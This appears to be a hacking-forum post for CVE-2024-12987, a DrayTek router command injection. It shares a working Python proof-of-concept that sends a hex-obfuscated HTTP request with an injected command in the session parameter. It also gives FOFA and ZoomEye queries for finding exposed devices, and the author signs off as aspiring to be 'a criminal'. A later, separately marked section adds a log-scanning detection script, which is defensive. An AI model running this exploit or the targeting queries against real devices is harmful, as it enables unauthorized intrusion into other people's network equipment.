CVE-2024-12987: DrayTek Gateways Remote Command Injection
by Aanya - Thursday January 16, 2025 at 12:19 PM
Understand this exploit: https://netsecfish.notion.site/Command-I...ffe29ce18f

POC
import socket
import socks


def send_http_request(host_ip, host_port, request):
    socket.socket = socks.socksocket
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(10)
            s.connect((host_ip, host_port))
            request = bytes.fromhex(request.decode())
            s.sendall(request)
            print("HTTP request sent:")
            print(request)

            response = b""
            while True:
                data = s.recv(4096)
                if not data:
                    break
                response += data

            return response.decode('utf-8', errors='replace')
    except Exception as e:
        print("An error occurred:", e)


if __name__ == "__main__":
    host = '<TARGET_IP>'
    port = '<TARGET_PORT>'

    request_apmcfgupload_pwd_binary = b'474554202F6367692D62696E2F6D61696E66756E6374696F6E2E6367692F61706D63666775706C6F61643F73657373696F6E3D7878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787830B42535322463253532246370776420485454502F312E300D0A0D0A'

    response = send_http_request(host, port, request_apmcfgupload_pwd_binary)

    print("HTTP response received:")
    print(response)


FOFA QUERY :
Quote: app="DrayTek-Vigor300B" || app="DrayTek-Vigor2960"
Quote:"excanvas.js" && "lang==\"zh-cn\"" && "detectLang" && server="DWS"
ZOOMEYE QUERY :
Quote: app="DrayTek Vigor 300B broadband router httpd" || app="DrayTek Vigor2960 router httpd"


With Heart @Aanya  kitten2
I Love Data
I am gonna be  a criminal , Hehehe
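A detection-side check for the request shown in the post above, added here as an example and not part of the original post: it scans HTTP access logs for hits on the endpoint the posted request targets and flags any `session` value that is missing or not plain alphanumerics. The endpoint and parameter name come from decoding the post's request bytes; the log source (combined-format logs from a proxy or sensor in front of the management interface), the alphanumeric-token rule and the sample lines are assumptions constructed for illustration.

```python
import re

# Endpoint and parameter name taken from decoding the hex request in the post above.
ENDPOINT = "/cgi-bin/mainfunction.cgi/apmcfgupload"
# Assumption: a legitimate session token is plain ASCII alphanumerics.
SAFE_SESSION = re.compile(r"[0-9A-Za-z]+")
# Request line inside a combined-format access log entry (assumed log source:
# a reverse proxy or network sensor in front of the management interface).
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>.*) HTTP/\d\.\d"')


def session_value(target):
    """Return the raw session value if target hits ENDPOINT, else None."""
    path, _, query = target.partition("?")
    if path.lower() != ENDPOINT:
        return None
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if name == "session":
            return value
    return ""  # endpoint requested without a session parameter


def suspicious_requests(log_lines):
    """Return (client_ip, raw_session) for endpoint hits with a missing or unsafe session."""
    hits = []
    for line in log_lines:
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        value = session_value(match.group("target"))
        if value is None or SAFE_SESSION.fullmatch(value):
            continue
        hits.append((line.split(" ", 1)[0], value))
    return hits


# Constructed sample lines (not captured traffic); session values are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Jan/2025:12:00:01 +0000] "GET /cgi-bin/mainfunction.cgi/apmcfgupload?session=a1b2c3d4e5 HTTP/1.1" 200 512',
    '198.51.100.7 - - [16/Jan/2025:12:00:05 +0000] "GET /cgi-bin/mainfunction.cgi/apmcfgupload?session=xxxx0\\xb4%25NN HTTP/1.0" 200 87',
    '203.0.113.4 - - [16/Jan/2025:12:00:09 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"ALERT {ip} session={value!r}")
```

Any hit from an address outside the administrative network is worth triage, since the management interface should not be reachable from untrusted networks in the first place.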